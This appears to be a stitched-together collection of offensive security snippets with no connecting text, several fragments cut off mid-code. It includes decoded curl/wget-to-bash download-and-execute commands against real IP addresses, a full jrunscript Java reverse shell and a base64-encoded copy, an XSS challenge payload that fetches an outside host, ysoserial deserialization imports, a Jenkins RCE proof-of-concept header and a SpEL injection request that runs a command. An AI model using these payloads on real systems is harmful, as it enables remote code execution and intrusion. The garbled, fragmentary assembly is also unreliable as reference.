0c0c0f

	b64decoded	hits
	(curl -s 45.155.205.233:5874/<IP_ADDRESS>\|\|wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)\|bash	2056
	(curl -s 80.71.158.12/lh.sh\|\|wget -q -O- 80.71.158.12/lh.sh)\|bash	162
	(curl -s 80.71.158.44/lh.sh\|\|wget -q -O- 80.71.158.44/lh.sh)\|bash	2

Solution

if(md5($salt.$api_string) !== $sig){ can be bypassed with hash length extension attack (didn't do it, but the key length is 12.)
Use custom header and body to trigger CSP bypass.

CVE-2019-8331

Bootstrap < 3.4.1 || < 4.3.1

✔️ CSP strict-dynamic bypass

➖ Requires user interaction

➖ Requires $('[data-toggle="tooltip"]').tooltip();

Get browser fingerprint example (fingerprintjs2)

import * as Fingerprint2 from 'fingerprintjs2'
import * as UAParser from 'ua-parser-js'

function _getFingerprint () {
  return new Promise((resolve, reject) => {
    async function getHash () {
      const options = {

Nashorn / Rhino:

Reverse Shell

$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'

Reverse Shell (Base-64 encoded)

$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V

Works in latest Firefox 58.0.2 (Windows 10, 64-bit) (copy-paste into browser to preserve URL encoding):

https://henhouse.cure53.berlin?value=<svg onload="document.cookie=`user=onerror%253dalert%253bthrow document.scripts[0].attributes[0].value%252f%252f;domain=.cure53.berlin`;fetch(atob(`aHR0cHM6Ly9iYWphbmlrLmNvbQ==`)).then(r=>r.text()).then(function(t){location=atob(atob(`YUhSMGNITTZMeTluYjJ4a1pXNWxaMmN1WTNWeVpUVXpMbUpsY214cGJpOC9lSE56UFR4NElHbGtQVmR2ZHlBdlBqeHpZM0pwY0hRZ2FXUTlkMlZzWTI5dFpVMXpaejQ4TDNOamNtbHdkRDRtZEc5clpXNDk=`))%2bt})">&key=.element.innerHTML

When pasting into submit.cure53.berlin, the above has to be URL decoded once:

https://henhouse.cure53.berlin?value=

	package ysoserial.payloads;

	import com.mchange.lang.ByteUtils;
	import org.apache.commons.collections.Transformer;
	import org.apache.commons.collections.functors.ChainedTransformer;
	import org.apache.commons.collections.functors.ConstantTransformer;
	import org.apache.commons.collections.functors.InvokerTransformer;
	import org.apache.commons.collections.keyvalue.TiedMapEntry;
	import org.apache.commons.collections.map.LazyMap;
	import ysoserial.payloads.annotation.Authors;

	#!/usr/bin/python

	# Author: Adam Jordan
	# Date: 2019-02-15
	# Repository: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
	# PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)


	import argparse
	import jenkins

	POST /users HTTP/1.1
	Host: localhost:8080
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 164

	username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf